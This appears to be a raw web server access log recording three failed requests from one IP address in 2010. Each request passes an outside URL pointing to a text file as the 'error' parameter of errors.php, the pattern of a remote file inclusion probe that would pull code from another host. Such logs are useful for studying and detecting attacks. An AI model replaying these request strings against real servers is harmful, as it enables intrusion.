195.9.14.148 - - [01/May/2010:07:44:30 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:32 -0500] "GET /logs/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
195.9.14.148 - - [01/May/2010:07:44:32 -0500] "GET /logs/access_log.1268611200%20%20/errors.php?error=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
